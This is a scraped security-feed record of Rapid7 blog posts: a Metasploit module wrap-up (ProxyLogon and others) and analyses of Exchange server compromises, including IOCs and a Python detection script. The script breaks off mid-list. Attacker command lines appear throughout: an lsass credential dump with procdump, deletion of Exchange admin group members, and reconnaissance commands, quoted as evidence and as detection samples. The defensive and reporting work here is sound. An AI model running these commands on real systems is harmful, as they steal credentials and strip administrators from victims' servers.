"href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT 
AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the "/Config/SaveUploadedHotspotLogoFile" upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. 
This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. 
The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. 
The `-s` flag allows one to search by rank, disclosure date, module name, module type, or whether the module implements a check method. The results are ordered in ascending order; users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex::Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation for Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped, which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages more understandable.\n\n * 
[#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. 
This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing 
detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) team identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. 
Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack. Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite these vulnerabilities being unknown to the public at the time, Rapid7 was able to identify the attacker's presence on systems with our Attacker Behavior Analytics library, helping customers defend against the use of these 0-day exploits.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. 
Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. 
Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). 
Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. 
See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. 
One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. 
These devices also commonly fall outside of standard patch management systems. Rapid7 has observed the window between the disclosure of a vulnerability and the mass use of a working exploit shrinking, which gives victims little time to test and deploy fixes while adhering to change control processes for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold is [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) against systems that expose remote access services, such as Remote Desktop Protocol, to the public internet. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is that the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. 
The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. 
This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the China Chopper client spawns processes through the webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). The resulting command line arguments are quite distinct and easy to find in logs that record command lines. This means detections developed against these patterns have the potential for an effective lifespan of the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that, by default, when IIS is configured for Microsoft Exchange\u2019s Outlook Web Access, the OWA worker process has the following environment variable and value set:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that matches whenever a process is executed and either its own or its parent\u2019s environment contains this variable and value. This allowed us not only to find the already known use of China Chopper, but also to find several other attackers exploiting this vulnerability with different techniques. 
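As an added example (not Rapid7's detection code, and not how InsightIDR implements the rules named in this post), the following Python runs an approximation of those detections over a handful of constructed process events: it checks for the `APP_POOL_ID=MSExchangeOWAAppPool` marker in the process's or its parent's environment, recognises the China Chopper command framing (`cmd /c cd /d <dir>&<command>&echo [S]&cd&echo [E]`, with the trailing `&cd&echo [E]` treated as optional because some command lines quoted in this post stop at `[S]`), and flags procdump aimed at lsass and `net group ... /del` against the Exchange Organization administrators group. The event layout and field names are assumptions; the sample command lines are modelled on those quoted in this post with a made-up domain name; the detection names are the post's, the matching logic is mine.

```python
import re

# IIS sets this variable on the worker process of Exchange's OWA application
# pool (quoted in the post); children of that w3wp.exe inherit it.
OWA_APP_POOL = ("APP_POOL_ID", "MSExchangeOWAAppPool")

# China Chopper's default client wraps every command it runs as
#   cmd /c cd /d <dir>&<command>&echo [S]&cd&echo [E]
# The [S]/[E] sentinels are the stable signal. The trailing "&cd&echo [E]" is
# optional here because some command lines quoted in the post stop at "[S]".
CHOPPER_RE = re.compile(
    r"^cmd(?:\.exe)?\s+/c\s+cd\s+/d\s+(?P<dir>.+?)&(?P<cmd>.+?)"
    r"&echo\s+\[S\](?:&cd&echo\s+\[E\])?\s*$",
    re.IGNORECASE,
)
# procdump/procdump64 aimed at lsass, however it was launched.
LSASS_DUMP_RE = re.compile(r"procdump(?:64)?(?:\.exe)?\s.*\blsass\b", re.IGNORECASE)
# net group ... /del against the Exchange Organization administrators group.
EXCHANGE_ADMIN_DEL_RE = re.compile(
    r'\bnet1?(?:\.exe)?\s+group\s+"exchange organization administrators"\s.*\s/del(?:ete)?\b',
    re.IGNORECASE,
)

# Detection names as listed in the post; the matching below is my approximation
# of them, not InsightIDR's rule logic.
OWA_SPAWN = "Suspicious Process - Process Spawned By Outlook Web Access"
CHOPPER = "Attacker Tool - China Chopper Webshell Executing Commands"
PROCDUMP_LSASS = "Attacker Technique - ProcDump Used Against LSASS"
NET_DEL_ADMIN = "Attacker Technique - Net Command Deleting Exchange Admin Group"


def spawned_by_owa(event):
    """True if the process or its parent carries the OWA app-pool marker."""
    key, value = OWA_APP_POOL
    return any(env.get(key) == value for env in (event.get("env", {}), event.get("parent_env", {})))


def parse_chopper(cmdline):
    """Return (working_dir, inner_command) for a Chopper-framed command line, else None."""
    m = CHOPPER_RE.match(cmdline)
    return (m.group("dir"), m.group("cmd")) if m else None


def evaluate(event):
    """Return the detection names one process event triggers, in a fixed order."""
    hits = []
    cmdline = event.get("cmdline", "")
    if spawned_by_owa(event):
        hits.append(OWA_SPAWN)
    if parse_chopper(cmdline):
        hits.append(CHOPPER)
    if LSASS_DUMP_RE.search(cmdline):
        hits.append(PROCDUMP_LSASS)
    if EXCHANGE_ADMIN_DEL_RE.search(cmdline):
        hits.append(NET_DEL_ADMIN)
    return hits


def run_detections(events):
    """Map event id -> hits for every event that triggers at least one detection."""
    results = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            results[event["id"]] = hits
    return results


OWA_ENV = {"APP_POOL_ID": "MSExchangeOWAAppPool", "SystemRoot": r"C:\Windows"}

# Constructed events (field names are assumptions). Command lines 1-4 are
# modelled on those quoted in the post, with the domain name made up.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": "w3wp.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r"cmd /c cd /d C:\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]"},
    {"id": 2, "parent_image": "w3wp.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r'cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]'},
    {"id": 3, "parent_image": "w3wp.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r'cmd /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&HOSTNAME" & whoami & nltest /dclist:corp.example&echo [S]&cd&echo [E]'},
    # Chopper framing that stops at [S], as some of the quoted attrib/del commands do.
    {"id": 4, "parent_image": "w3wp.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": r"cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]"},
    # Child of the OWA worker without Chopper framing: still worth an alert.
    {"id": 5, "parent_image": "w3wp.exe", "env": OWA_ENV, "parent_env": OWA_ENV,
     "cmdline": "cmd.exe /c whoami"},
    # Scheduled backup task: no app-pool marker, no Chopper framing, no alert.
    {"id": 6, "parent_image": "svchost.exe", "env": {"SystemRoot": r"C:\Windows"}, "parent_env": {},
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
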